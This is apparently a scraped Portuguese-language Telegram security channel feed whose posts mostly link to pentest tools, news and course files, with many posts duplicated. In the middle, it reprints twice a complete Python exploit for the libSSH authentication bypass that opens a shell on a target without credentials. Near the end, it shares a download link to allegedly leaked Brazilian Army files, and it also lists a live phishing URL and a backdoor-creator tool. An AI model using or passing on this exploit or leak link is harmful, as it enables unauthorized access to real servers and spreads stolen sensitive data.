Escaneando vulnerabilidades com nmap
Nmap é um dos Scanners de porta mais conhecidos no mundo hacker, por obter várias funções e a possibilidade de usar noscripts NSE.
https://rubyofsec.wordpress.com/2018/10/12/escaneando-vulnerabilidades-com-nmap/
🌏@RubyOfSec
Nmap é um dos Scanners de porta mais conhecidos no mundo hacker, por obter várias funções e a possibilidade de usar noscripts NSE.
https://rubyofsec.wordpress.com/2018/10/12/escaneando-vulnerabilidades-com-nmap/
🌏@RubyOfSec
RubyOfSecurity
Escaneando vulnerabilidades com nmap
Nmap é um dos Scanners de porta mais conhecidos no mundo hacker, por obter várias funções e a possibilidade de usar noscripts NSE, Com o nmap, é possível verificar vulnerabilidades em dispositivos. P…
Pentest-Machine - Automates Some Pentest Jobs Via Nmap Xml File
Automatiza algum trabalho pentesting através de um arquivo XML nmap. Assim que cada comando termina, grava sua saída no terminal e os arquivos em output-by-service / e output-by-host /. Executa comandos de retorno rápido primeiro. Por favor me envie protocolos / comandos / opções que você gostaria de ver incluídos.
🌏@RubyOfSec
https://www.kitploit.com/2018/10/pentest-machine-automates-some-pentest.html
Automatiza algum trabalho pentesting através de um arquivo XML nmap. Assim que cada comando termina, grava sua saída no terminal e os arquivos em output-by-service / e output-by-host /. Executa comandos de retorno rápido primeiro. Por favor me envie protocolos / comandos / opções que você gostaria de ver incluídos.
🌏@RubyOfSec
https://www.kitploit.com/2018/10/pentest-machine-automates-some-pentest.html
KitPloit - PenTest Tools for your Security Arsenal ☣
Pentest-Machine - Automates Some Pentest Jobs Via Nmap Xml File
Leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security ☣
Vazamento de Dados – Pardinho e PMMG – Lil_Sh4wtyy
Nosso sistema de Monitoramento Avançado Persistente identificou, em 18/10, publicação no site de compartilhamento de texto Ghostbin contendo vazamento de dados do município de Pardinho/SP e publicação no Twitter com imagem de busca de vulnerabilidade na página da Polícia Militar de Minas Gerais (PM/MG). As ações foram realizadas pelo hacker brasileiro Lil_Sh4wtyy, integrante da equipe ElitePentesting.
O vazamento do município de Pardinho/SP inclui nomes de tabelas da base de dados e credenciais de acesso (usuário/senha) em texto claro.
🌏@RubyOfSec
https://www.defcon-lab.org/vazamento-de-dados-pardinho-e-pmmg-lil_sh4wtyy/
Nosso sistema de Monitoramento Avançado Persistente identificou, em 18/10, publicação no site de compartilhamento de texto Ghostbin contendo vazamento de dados do município de Pardinho/SP e publicação no Twitter com imagem de busca de vulnerabilidade na página da Polícia Militar de Minas Gerais (PM/MG). As ações foram realizadas pelo hacker brasileiro Lil_Sh4wtyy, integrante da equipe ElitePentesting.
O vazamento do município de Pardinho/SP inclui nomes de tabelas da base de dados e credenciais de acesso (usuário/senha) em texto claro.
🌏@RubyOfSec
https://www.defcon-lab.org/vazamento-de-dados-pardinho-e-pmmg-lil_sh4wtyy/
DefCon-Lab.org
Vazamento de Dados – Pardinho e PMMG – Lil_Sh4wtyy
Nosso sistema de Monitoramento Avançado Persistente identificou, em 18/10, publicação no site de compartilhamento de texto Ghostbin contendo vazamento de dados do município de Pardinho/SP e publica…
Introdução ao uso do programa R : https://cran.r-project.org/doc/contrib/Landeiro-Introducao.pdf
libSSH Authentication Bypass
libSSH suffers from an authentication bypass vulnerability.
Bypass;
#!/usr/bin/env python3
import paramiko
import socket
import argparse
from sys import argv, exit
parser = argparse.ArgumentParser(denoscription="libSSH Authentication Bypass")
parser.add_argument('--host', help='Host')
parser.add_argument('-p', '--port', help='libSSH port', default=22)
parser.add_argument('-log', '--logfile', help='Logfile to write conn logs', default="paramiko.log")
args = parser.parse_args()
def BypasslibSSHwithoutcredentials(hostname, port):
sock = socket.socket()
try:
sock.connect((str(hostname), int(port)))
message = paramiko.message.Message()
transport = paramiko.transport.Transport(sock)
transport.start_client()
message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
transport._send_message(message)
spawncmd = transport.open_session()
spawncmd.invoke_shell()
return 0
except paramiko.SSHException as e:
print("TCPForwarding disabled on remote/local server can't connect. Not Vulnerable")
return 1
except socket.error:
print("Unable to connect.")
return 1
def main():
paramiko.util.log_to_file(args.logfile)
try:
hostname = args.host
port = args.port
except:
parser.print_help()
exit(1)
BypasslibSSHwithoutcredentials(hostname, port)
if name == 'main':
exit(main())
fonte: https://exploit.kitploit.com/2018/10/libssh-authentication-bypass.html
libSSH suffers from an authentication bypass vulnerability.
Bypass;
#!/usr/bin/env python3
import paramiko
import socket
import argparse
from sys import argv, exit
parser = argparse.ArgumentParser(denoscription="libSSH Authentication Bypass")
parser.add_argument('--host', help='Host')
parser.add_argument('-p', '--port', help='libSSH port', default=22)
parser.add_argument('-log', '--logfile', help='Logfile to write conn logs', default="paramiko.log")
args = parser.parse_args()
def BypasslibSSHwithoutcredentials(hostname, port):
sock = socket.socket()
try:
sock.connect((str(hostname), int(port)))
message = paramiko.message.Message()
transport = paramiko.transport.Transport(sock)
transport.start_client()
message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
transport._send_message(message)
spawncmd = transport.open_session()
spawncmd.invoke_shell()
return 0
except paramiko.SSHException as e:
print("TCPForwarding disabled on remote/local server can't connect. Not Vulnerable")
return 1
except socket.error:
print("Unable to connect.")
return 1
def main():
paramiko.util.log_to_file(args.logfile)
try:
hostname = args.host
port = args.port
except:
parser.print_help()
exit(1)
BypasslibSSHwithoutcredentials(hostname, port)
if name == 'main':
exit(main())
fonte: https://exploit.kitploit.com/2018/10/libssh-authentication-bypass.html
Kitploit
libSSH Authentication Bypass
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Falha crítica de segurança afeta VLC e outros players de mídia
Foi descoberto uma vulnerabilidade de execução de código remoto na biblioteca de streaming de mídia LIVE555. O conjunto de bibliotecas C++ LIVE555 é utilizado por players de mídia muito utilizados no mercado, como o VLC e o MPlayer.
Mantido pela empresa Live Networks, a biblioteca trabalha com protocolos RTP/RTCP, RTSP ou SIP, com a capacidade de processar formatos de vídeo e áudio como MPEG, H.265, H.264, H.263+, VP8, DV, JPEG, MPEG, AAC, AMR, AC-3 e Vorbis.
Atualize os seus players de mídia, como o VLC e o MPlayer
A falha descoberta deixa milhões de usuários dos media players vulneráveis à ciberataques, segundo Lilith Wyatt, pesquisadora da Cisco Talos Intelligence Grupo. No caso, a brecha reside na funcionalidade de análise de pacotes HTTP, que analisa cabeçalhos HTTP para encapsulamento de RTSP sobre HTTP, explica o The Hacker News.
🌏@RubyOfSec
https://m.tecmundo.com.br/amp/seguranca/135385-falha-critica-seguranca-afeta-vlc-outros-players-midia.htm?__twitter_impression=true
Foi descoberto uma vulnerabilidade de execução de código remoto na biblioteca de streaming de mídia LIVE555. O conjunto de bibliotecas C++ LIVE555 é utilizado por players de mídia muito utilizados no mercado, como o VLC e o MPlayer.
Mantido pela empresa Live Networks, a biblioteca trabalha com protocolos RTP/RTCP, RTSP ou SIP, com a capacidade de processar formatos de vídeo e áudio como MPEG, H.265, H.264, H.263+, VP8, DV, JPEG, MPEG, AAC, AMR, AC-3 e Vorbis.
Atualize os seus players de mídia, como o VLC e o MPlayer
A falha descoberta deixa milhões de usuários dos media players vulneráveis à ciberataques, segundo Lilith Wyatt, pesquisadora da Cisco Talos Intelligence Grupo. No caso, a brecha reside na funcionalidade de análise de pacotes HTTP, que analisa cabeçalhos HTTP para encapsulamento de RTSP sobre HTTP, explica o The Hacker News.
🌏@RubyOfSec
https://m.tecmundo.com.br/amp/seguranca/135385-falha-critica-seguranca-afeta-vlc-outros-players-midia.htm?__twitter_impression=true
TecMundo - Descubra e aprenda tudo sobre tecnologia
Falha crítica de segurança afeta VLC e outros players de mídia
Atualize os seus players de mídia, como o VLC e o MPlayer
#SabiasQue #Ghostman #RFS
Sabias que ?
Ser um hacker ético é uma das melhores formas de usar o conhecimento sobre a segurança da informação, pois assim contribuímos para a segurança mundial.
Reportando vulnerabilidades, realizando Testes de penetração, etc.
O Mundo precisa de mais pessoas que estudam a segurança da informação para praticar o bem, ou seja, usar a ética hacker.
🌎@RubyOfSec
Sabias que ?
Ser um hacker ético é uma das melhores formas de usar o conhecimento sobre a segurança da informação, pois assim contribuímos para a segurança mundial.
Reportando vulnerabilidades, realizando Testes de penetração, etc.
O Mundo precisa de mais pessoas que estudam a segurança da informação para praticar o bem, ou seja, usar a ética hacker.
🌎@RubyOfSec
TESTE DE VULNERABILIDADES
EM APLICAÇÕES WEB
Prof: NÍCHOLAS ANTUNES CINTO
Data: 09/16/2015 3:19:17 PM
Creator: Microsoft® Word 2013
Link: https://cepein.femanet.com.br/BDigital/arqTccs/1211330211.pdf
ANÁLISE DE VULNERABILIDADES EM
APLICAÇÕES ANDROID COM O USO DE
FERRAMENTAS DE TESTE DE INTRUSÃO E A
METODOLOGIA OWASP
Prof: DIMAS ALBUQUERQU
E MENDES
Data: 12/21/2017, 5:08:28 AM
Creator: Microsoft® Word 2016
Link: http://www.cin.ufpe.br/~tg/2017-2/dam4-tg.pdf
🌎@RubyOfSec
Para pedir algum arquivo que deseja, entre no grupo, vamos avaliar e consultar nosso banco de dados e verificar se temos o conteudo.; https://news.1rj.ru/str/rubyofsecgroup
EM APLICAÇÕES WEB
Prof: NÍCHOLAS ANTUNES CINTO
Data: 09/16/2015 3:19:17 PM
Creator: Microsoft® Word 2013
Link: https://cepein.femanet.com.br/BDigital/arqTccs/1211330211.pdf
ANÁLISE DE VULNERABILIDADES EM
APLICAÇÕES ANDROID COM O USO DE
FERRAMENTAS DE TESTE DE INTRUSÃO E A
METODOLOGIA OWASP
Prof: DIMAS ALBUQUERQU
E MENDES
Data: 12/21/2017, 5:08:28 AM
Creator: Microsoft® Word 2016
Link: http://www.cin.ufpe.br/~tg/2017-2/dam4-tg.pdf
🌎@RubyOfSec
Para pedir algum arquivo que deseja, entre no grupo, vamos avaliar e consultar nosso banco de dados e verificar se temos o conteudo.; https://news.1rj.ru/str/rubyofsecgroup
Computer Hacking Forensic Investigator (CHFI)
CHFI Module 1 Introduction
http://www.mediafire.com/file/yinvs2vtn4ix9z0/CHFI_Module_1_Introduction.rar
CHFI Module 2 Forensics & Investigation Process
http://www.mediafire.com/file/9yai0s961xkb7p3/CHFI+Module+2+Forensics+Investigation+Process.rar
CHFI Module 3 Searching & Seizing
http://www.mediafire.com/file/l16n7as0zc5fgb4/CHFI_Module_3_Searching_&_Seizing.rar
CHFI Module 4 Digital Evidence
http://www.mediafire.com/file/3ajk8erktw1a4ug/CHFI+Module+4+Digital+Evidence%282%29.rar
CHFI Module 5 Responder Procedures
http://www.mediafire.com/file/8oarrkysj2pyymo/CHFI_Module_5_Responder_Procedures.rar
CHFI Module 6 Forensic Lab
http://www.mediafire.com/file/jqqoiy6ko91ov5c/CHFI_Module_6_Forensic_Lab.rar
CHFI Module 7 Hard Disks & File Systems
http://www.mediafire.com/file/unk51i52idt53ay/CHFI_Module_7_Hard_Disks_&__File_Systems.rar
CHFI Module 8 Windows Forensics
http://www.mediafire.com/file/6azb12untw5itww/CHFI_Module_8_Windows_Forensics.rar
SHELL SHOCK, [21.10.18 19:18]
CHFI Module 9 Data Akquisition & Duplication
http://www.mediafire.com/file/3dzf4qdln3pn6qi/CHFI_Module_9_Data_Acquisition_and_Duplication.rar
CHFI Module 10 Recovering deleted Files & & partitions
http://www.mediafire.com/file/ifl18p77a10c2az/CHFI_Module_10_Recovering_Deleted_Files_and_Partitions.rar
CHFI Module 11 Using Access Data FTK
http://www.mediafire.com/file/2zabeg7axi7cwdd/CHFI_Module_11_Using_Access_Data_FTK.rar
CHFI Module 12 Using EnCas
http://www.mediafire.com/file/m1nop2yk6pwsvn0/CHFI_Module_12_Using_EnCase.rar
CHFI Module 13 Steganography
http://www.mediafire.com/file/5aay0ed5uzt8y97/CHFI_Module_13_Steganography.rar
CHFI Module 14 Password Crackers
http://www.mediafire.com/file/k16714g10alwwkb/CHFI_Module_14_Password_Crackers.rar
CHFI Module 15 Log Correlation
http://www.mediafire.com/file/990ili11icinm5c/CHFI_Module_15_Log_Correlation.rar
CHFI Module 16 Network Forensics
http://www.mediafire.com/file/qsrr2yn0ptreyre/CHFI_Module_16_Network_Forensics.rar
CHFI Module 17 Wireless Attacks
http://www.mediafire.com/file/ip1ded3iumcr3dg/CHFI_Module_17_Wireless_Attacks.rar
CHFI Module 18 Web Attacks
http://www.mediafire.com/file/ldrew3v8x298htu/CHFI_Module_18_Web_Attacks.rar
CHFI Module 19 Email Crimes
http://www.mediafire.com/file/82xh758lt2by927/CHFI_Module_19_Email_Crimes.rar
CHFI Module 20 Mobile Investigation
http://www.mediafire.com/file/8lu73yi1s79iw1b/CHFI_Module_20_Mobile_Investigation.rar
CHFI Module 21 Investigative Reports
http://www.mediafire.com/file/jz70shpdzso40ne/CHFI_Module_21_Investigative_Reports.rar
CHFI Module 22 Expert Witness
http://www.mediafire.com/file/926yco1rhqo2ow2/CHFI+Module+22+Expert+Witness.rar
CHFI Module 1 Introduction
http://www.mediafire.com/file/yinvs2vtn4ix9z0/CHFI_Module_1_Introduction.rar
CHFI Module 2 Forensics & Investigation Process
http://www.mediafire.com/file/9yai0s961xkb7p3/CHFI+Module+2+Forensics+Investigation+Process.rar
CHFI Module 3 Searching & Seizing
http://www.mediafire.com/file/l16n7as0zc5fgb4/CHFI_Module_3_Searching_&_Seizing.rar
CHFI Module 4 Digital Evidence
http://www.mediafire.com/file/3ajk8erktw1a4ug/CHFI+Module+4+Digital+Evidence%282%29.rar
CHFI Module 5 Responder Procedures
http://www.mediafire.com/file/8oarrkysj2pyymo/CHFI_Module_5_Responder_Procedures.rar
CHFI Module 6 Forensic Lab
http://www.mediafire.com/file/jqqoiy6ko91ov5c/CHFI_Module_6_Forensic_Lab.rar
CHFI Module 7 Hard Disks & File Systems
http://www.mediafire.com/file/unk51i52idt53ay/CHFI_Module_7_Hard_Disks_&__File_Systems.rar
CHFI Module 8 Windows Forensics
http://www.mediafire.com/file/6azb12untw5itww/CHFI_Module_8_Windows_Forensics.rar
SHELL SHOCK, [21.10.18 19:18]
CHFI Module 9 Data Akquisition & Duplication
http://www.mediafire.com/file/3dzf4qdln3pn6qi/CHFI_Module_9_Data_Acquisition_and_Duplication.rar
CHFI Module 10 Recovering deleted Files & & partitions
http://www.mediafire.com/file/ifl18p77a10c2az/CHFI_Module_10_Recovering_Deleted_Files_and_Partitions.rar
CHFI Module 11 Using Access Data FTK
http://www.mediafire.com/file/2zabeg7axi7cwdd/CHFI_Module_11_Using_Access_Data_FTK.rar
CHFI Module 12 Using EnCas
http://www.mediafire.com/file/m1nop2yk6pwsvn0/CHFI_Module_12_Using_EnCase.rar
CHFI Module 13 Steganography
http://www.mediafire.com/file/5aay0ed5uzt8y97/CHFI_Module_13_Steganography.rar
CHFI Module 14 Password Crackers
http://www.mediafire.com/file/k16714g10alwwkb/CHFI_Module_14_Password_Crackers.rar
CHFI Module 15 Log Correlation
http://www.mediafire.com/file/990ili11icinm5c/CHFI_Module_15_Log_Correlation.rar
CHFI Module 16 Network Forensics
http://www.mediafire.com/file/qsrr2yn0ptreyre/CHFI_Module_16_Network_Forensics.rar
CHFI Module 17 Wireless Attacks
http://www.mediafire.com/file/ip1ded3iumcr3dg/CHFI_Module_17_Wireless_Attacks.rar
CHFI Module 18 Web Attacks
http://www.mediafire.com/file/ldrew3v8x298htu/CHFI_Module_18_Web_Attacks.rar
CHFI Module 19 Email Crimes
http://www.mediafire.com/file/82xh758lt2by927/CHFI_Module_19_Email_Crimes.rar
CHFI Module 20 Mobile Investigation
http://www.mediafire.com/file/8lu73yi1s79iw1b/CHFI_Module_20_Mobile_Investigation.rar
CHFI Module 21 Investigative Reports
http://www.mediafire.com/file/jz70shpdzso40ne/CHFI_Module_21_Investigative_Reports.rar
CHFI Module 22 Expert Witness
http://www.mediafire.com/file/926yco1rhqo2ow2/CHFI+Module+22+Expert+Witness.rar
LISTA DE ABREVIATURAS E SIGLAS
ADT: Android Development Tools
ART: Android Runtime
API: Application Programming Interface
APK: Android Package Kit
DVM: Dalvik Virtual Machine
HTTP: Hypertext Transfer Protocol
HTTPS: Hypertext Transfer Protocol Secure
IDE: Integrated Development Environment
IETF: Internet Engineering Task Force
RFC: Request For Comments
JVM: Java Virtual Machine
JNI: Java Native Interface
SDK: Software Development Kit
SSL: Security Socket Layer
TLS: Transport Layer Security
UI: User Interface
OWASP: Open Web Application Security Project
🌎@RubyOfSec
ADT: Android Development Tools
ART: Android Runtime
API: Application Programming Interface
APK: Android Package Kit
DVM: Dalvik Virtual Machine
HTTP: Hypertext Transfer Protocol
HTTPS: Hypertext Transfer Protocol Secure
IDE: Integrated Development Environment
IETF: Internet Engineering Task Force
RFC: Request For Comments
JVM: Java Virtual Machine
JNI: Java Native Interface
SDK: Software Development Kit
SSL: Security Socket Layer
TLS: Transport Layer Security
UI: User Interface
OWASP: Open Web Application Security Project
🌎@RubyOfSec
WPScan v3.3.1 - Black Box WordPress Vulnerability Scanner
WPScan é um software livre, para uso não comercial, que é um scanner de vulnerabilidades WordPress em caixa preta escrito para profissionais de segurança e mantenedores de blogs para testar a segurança de seus sites.
Requisitos:
Ruby >= 2.2.2 - Recommended: 2.3.3
Curl >= 7.21 - Recommended: latest - FYI the 7.29 has a segfault
RubyGems - Recommended: latest
🌎@RubyOfSec
https://www.kitploit.com/2018/10/wpscan-v331-black-box-wordpress.html
WPScan é um software livre, para uso não comercial, que é um scanner de vulnerabilidades WordPress em caixa preta escrito para profissionais de segurança e mantenedores de blogs para testar a segurança de seus sites.
Requisitos:
Ruby >= 2.2.2 - Recommended: 2.3.3
Curl >= 7.21 - Recommended: latest - FYI the 7.29 has a segfault
RubyGems - Recommended: latest
🌎@RubyOfSec
https://www.kitploit.com/2018/10/wpscan-v331-black-box-wordpress.html
KitPloit - PenTest & Hacking Tools for your CyberSecurity Kit ☣
WPScan v3.3.1 - Black Box WordPress Vulnerability Scanner
KitPloit - PenTest & Hacking Tools for your CyberSecurity Kit ☣: WPScan v3.3.1 - Black Box WordPress Vulnerability Scanner
CT-Exposer - An OSINT Tool That Discovers Sub-Domains By Searching Certificate Transparency Logs
Descubra subdomínios pesquisando nos registros de transparência de certificados.
O que é CT?
Transparência de certificado (CT) é um padrão experimental da IETF. O objetivo era permitir que o público auditasse quais certificados foram criados pelas Autoridades de Certificação (CA). O TLS tem uma fraqueza que vem da grande lista de CAs que seu navegador confia implicitamente. Se alguma dessas CAs criasse um novo certificado para um domínio de maneira mal-intencionada, seu navegador confiaria nele. A CT adiciona benefícios à confiança do certificado TLS: as empresas podem monitorar quem está criando certificados para os domínios que possuem. Ele também permite que os navegadores verifiquem se o certificado de um determinado domínio está no registro de log público.
Esses registros acabam sendo uma mina de ouro de informações para testadores de penetração e equipes vermelhas.
O que você pode encontrar com o ct-exposer?
O ct-exposer consultará os logs de CT para um determinado domínio e tentará fazer pesquisas de DNS para os domínios para ver quais existem no DNS. Na minha experiência, até agora, encontrei vários subdomínios que não foram localizados com as pesquisas do google: site: domain.com. Tenha em mente que os domínios que não resolvem podem ser domínios antigos ou domínios internos (Ex: você precisa acessar o servidor DNS interno para resolvê-los).
Requisitos:
Python3, gevent, requests e urllib3.
🌎@RubyOfSec
https://www.kitploit.com/2018/10/ct-exposer-osint-tool-that-discovers.html
Descubra subdomínios pesquisando nos registros de transparência de certificados.
O que é CT?
Transparência de certificado (CT) é um padrão experimental da IETF. O objetivo era permitir que o público auditasse quais certificados foram criados pelas Autoridades de Certificação (CA). O TLS tem uma fraqueza que vem da grande lista de CAs que seu navegador confia implicitamente. Se alguma dessas CAs criasse um novo certificado para um domínio de maneira mal-intencionada, seu navegador confiaria nele. A CT adiciona benefícios à confiança do certificado TLS: as empresas podem monitorar quem está criando certificados para os domínios que possuem. Ele também permite que os navegadores verifiquem se o certificado de um determinado domínio está no registro de log público.
Esses registros acabam sendo uma mina de ouro de informações para testadores de penetração e equipes vermelhas.
O que você pode encontrar com o ct-exposer?
O ct-exposer consultará os logs de CT para um determinado domínio e tentará fazer pesquisas de DNS para os domínios para ver quais existem no DNS. Na minha experiência, até agora, encontrei vários subdomínios que não foram localizados com as pesquisas do google: site: domain.com. Tenha em mente que os domínios que não resolvem podem ser domínios antigos ou domínios internos (Ex: você precisa acessar o servidor DNS interno para resolvê-los).
Requisitos:
Python3, gevent, requests e urllib3.
🌎@RubyOfSec
https://www.kitploit.com/2018/10/ct-exposer-osint-tool-that-discovers.html
KitPloit - PenTest & Hacking Tools for your CyberSecurity Kit ☣
CT-Exposer - An OSINT Tool That Discovers Sub-Domains By Searching Certificate Transparency Logs
KitPloit - PenTest & Hacking Tools for your CyberSecurity Kit ☣: CT-Exposer - An OSINT Tool That Discovers Sub-Domains By Searching Certificate Transparency Logs
Aprendendo JavaScript
Data: 21 de fevereiro de 2008
Prof: Filipe Del Nero Grillo
Renata Pontin de Mattos Fortes
Link: http://conteudo.icmc.usp.br/CMS/Arquivos/arquivos_enviados/BIBLIOTECA_113_ND_72.pdf
JavaScript Overview
http://www.fernandolobo.info/daw/slides/javanoscript-overview.pdf
Data: 21 de fevereiro de 2008
Prof: Filipe Del Nero Grillo
Renata Pontin de Mattos Fortes
Link: http://conteudo.icmc.usp.br/CMS/Arquivos/arquivos_enviados/BIBLIOTECA_113_ND_72.pdf
JavaScript Overview
http://www.fernandolobo.info/daw/slides/javanoscript-overview.pdf
Phishing – Vereda-BA – PayPal
Nosso sistema de Monitoramento Avançado Persistente identificou, em 22/10, novo caso de phishing hospedado em página de governo brasileiro, no município de Vereda/BA, uma página que simula o serviço de pagamento PayPal.
Casos de Phishing hospedados nos domínios ba.gov.br e tjba.jus.br já foram relatados aqui no Blog no post Sorria, tem pescaria na Bahia e a saga da pescaria na Bahia continua.
O phishing pode ser acessado por meio da URL http://vereda.ba.gov.br/wp/wp-content/uploads/2013/05/public/myaccount/settings/
🌎@RubyOfSec
https://www.defcon-lab.org/phishing-vereda-ba-paypal/
Nosso sistema de Monitoramento Avançado Persistente identificou, em 22/10, novo caso de phishing hospedado em página de governo brasileiro, no município de Vereda/BA, uma página que simula o serviço de pagamento PayPal.
Casos de Phishing hospedados nos domínios ba.gov.br e tjba.jus.br já foram relatados aqui no Blog no post Sorria, tem pescaria na Bahia e a saga da pescaria na Bahia continua.
O phishing pode ser acessado por meio da URL http://vereda.ba.gov.br/wp/wp-content/uploads/2013/05/public/myaccount/settings/
🌎@RubyOfSec
https://www.defcon-lab.org/phishing-vereda-ba-paypal/
DefCon-Lab.org
Phishing – Vereda-BA – PayPal
Nosso sistema de Monitoramento Avançado Persistente identificou, em 22/10, novo caso de phishing hospedado em página de governo brasileiro, no município de Vereda/BA, uma página que simula o serviç…
WinSpy - A Windows Reverse Shell Backdoor Creator With An Automatic IP Poisener
🌎@RubyOfSec
https://www.kitploit.com/2018/10/winspy-windows-reverse-shell-backdoor.html
🌎@RubyOfSec
https://www.kitploit.com/2018/10/winspy-windows-reverse-shell-backdoor.html
KitPloit - PenTest & Hacking Tools
WinSpy - A Windows Reverse Shell Backdoor Creator With An Automatic IP Poisener
TLS-Scanner - The TLS-Scanner Module From TLS-Attacker
O TLS-Scanner é uma ferramenta criada pela Chair for Network and Data Security da Ruhr-University Bochum para auxiliar os pentesters e pesquisadores de segurança na avaliação das configurações do TLS Server.
Atenção: O TLS-Scanner é uma ferramenta de pesquisa destinada a desenvolvedores, pentesters, administradores e pesquisadores de TLS. Não há GUI. Está na primeira versão e pode conter alguns bugs.
🌎@RubyOfSec
https://www.kitploit.com/2018/10/tls-scanner-tls-scanner-module-from-tls.html
O TLS-Scanner é uma ferramenta criada pela Chair for Network and Data Security da Ruhr-University Bochum para auxiliar os pentesters e pesquisadores de segurança na avaliação das configurações do TLS Server.
Atenção: O TLS-Scanner é uma ferramenta de pesquisa destinada a desenvolvedores, pentesters, administradores e pesquisadores de TLS. Não há GUI. Está na primeira versão e pode conter alguns bugs.
🌎@RubyOfSec
https://www.kitploit.com/2018/10/tls-scanner-tls-scanner-module-from-tls.html
KitPloit - PenTest Tools for your Security Arsenal ☣
TLS-Scanner - The TLS-Scanner Module From TLS-Attacker
Leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security ☣
Exército Brasileiro - Arquivo Secreto
Hackers Vazam Dados sensíveis e sigilosos do exército brasileiro, Não se sabe ainda o motivo do vazamento, Informações que cita o candidato a presidente (Jair Messias Bolsonaro).
🌏 @RubyOfSec
Download: https://drive.google.com/file/d/1Q7rEKbl2d4n7iJ_INKxFr1kbGb0dpC9_/view?usp=drivesdk
Hackers Vazam Dados sensíveis e sigilosos do exército brasileiro, Não se sabe ainda o motivo do vazamento, Informações que cita o candidato a presidente (Jair Messias Bolsonaro).
🌏 @RubyOfSec
Download: https://drive.google.com/file/d/1Q7rEKbl2d4n7iJ_INKxFr1kbGb0dpC9_/view?usp=drivesdk